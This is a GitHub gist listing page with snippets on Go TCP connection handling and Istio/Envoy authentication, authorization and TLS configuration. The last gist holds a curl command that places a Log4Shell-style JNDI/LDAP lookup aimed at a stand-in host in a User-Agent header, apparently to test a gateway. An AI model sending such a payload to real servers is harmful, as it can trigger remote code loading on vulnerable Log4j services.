Skip to content

Instantly share code, notes, and snippets.

View incfly's full-sized avatar

Jianfei Hu incfly

70 followers · 6 following
  • ClickHouse
  • San Francisco Bay Area
View GitHub Profile
@incfly
incfly / readme.md
Created March 12, 2025 22:49
What would happen for net.Conn read when conn is closed.

Demo

# Terminal 1
./tcp-server --port 8080 --close graceful --delay 3

# Terminal 2
./tcp-client --port 8080 --mode read
[EOF] Server closed the connection gracefully
Client terminating
@incfly
incfly / Dockerfile
Created August 12, 2024 23:07
# Use the official Ubuntu as a base image
FROM ubuntu:latest
# Set the working directory inside the container
WORKDIR /app
# Copy the Go binary from the host to the container
COPY server /app/server
# Set the binary as the entry point
@incfly
incfly / problem.go
Created June 2, 2022 22:02
package main
type eventType int
const (
addWord eventType = 0
removeWord
)
type event struct {
@incfly
incfly / authn-authz.yaml
Created May 27, 2022 18:56
conditional-authservice
apiVersion: security.istio.io/v1beta1
kind: RequestAuthentication
metadata:
name: httpbin
namespace: foo
spec:
selector:
matchLabels:
app: httpbin
jwtRules:
@incfly
incfly / authz.yaml
Created April 29, 2022 18:51
istio-rbac-customize-error-message
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: allow-nothing
namespace: default
spec:
{}
@incfly
incfly / app.go
Last active April 28, 2022 20:24
envoy-local-reply-not-working
// +build ignore
package main
import (
"flag"
"fmt"
"net"
"net/http"
"strconv"
@incfly
incfly / bazel-query
Last active April 5, 2022 02:56
$ bazel cquery --define boringssl=fips "//source/extensions/transport_sockets/tls/cert_validator:cert_validator_lib" --output=build
Starting local Bazel server and connecting to it...
INFO: Invocation ID: f7ce5045-4ac3-4146-9a65-7434359a79b1
INFO: SHA256 (https://golang.org/dl/?mode=json&include=all) = 8894bb6908be51c3ad0177954dbd7c3355de9c6a5960b2cb550c8b68ca953b79
INFO: Analyzed target //source/extensions/transport_sockets/tls/cert_validator:cert_validator_lib (247 packages loaded, 17216 targets configured).
INFO: Found 1 target...
# /home/fly/workspace/github.com/envoyproxy/envoy/source/extensions/transport_sockets/tls/cert_validator/BUILD:11:17
cc_library(
name = "cert_validator_lib",
visibility = ["//visibility:public"],
@incfly
incfly / httpbin-ingress.yaml
Last active March 8, 2022 13:40
httpbin-tls-cert-extra-bytes.
apiVersion: v1
kind: ServiceAccount
metadata:
name: httpbin
---
apiVersion: v1
kind: Secret
metadata:
name: httpbin-credential
namespace: istio-system
@incfly
incfly / test-status.yaml
Created January 6, 2022 10:33
# 2022-01-06T09:32:48.168864Z info status jianfeih debug, config:
# fqn gateway.xcp.tetrate.io/v2/IngressGateway:xcp-edge/test-ingress-gateway,
# status {gateway.xcp.tetrate.io/v2/IngressGateway:xcp-edge/test-ingress-gateway READY
# [name:"test-ingress-gateway" namespace:"echo-7-93217" result:READY
# name:"test-ingress-gateway-httpbin-mesh-internal" namespace:"echo-7-93217" result:READY
# name:"test-ingress-gateway-mesh-external" namespace:"echo-7-93217" result:READY
# name:"vs-app2-tetrate-io" namespace:"echo-7-93217" result:READY ] {} [] 0}
# Apply this in xcp-edge works, but in xcp-system not works (not propagating to the xcp-edge namespace.)
@incfly
incfly / step1-curl.sh
Last active January 5, 2022 07:58
curl -H “Host: httpbin.tetrate.com” -H “User-Agent: ${JNDI://ldap://evial.xx/path}” \
–resolve “httpbin.tetrate.com:${GATEWAY_IP}” httpbin.tetrate.com/headers
< HTTP/1.1 200 OK
< server: envoy
< date: Tue, 28 Dec 2021 05:48:57 GMT
< content-type: application/json
< content-length: 28
< access-control-allow-origin: *
< access-control-allow-credentials: true
< x-envoy-upstream-service-time: 25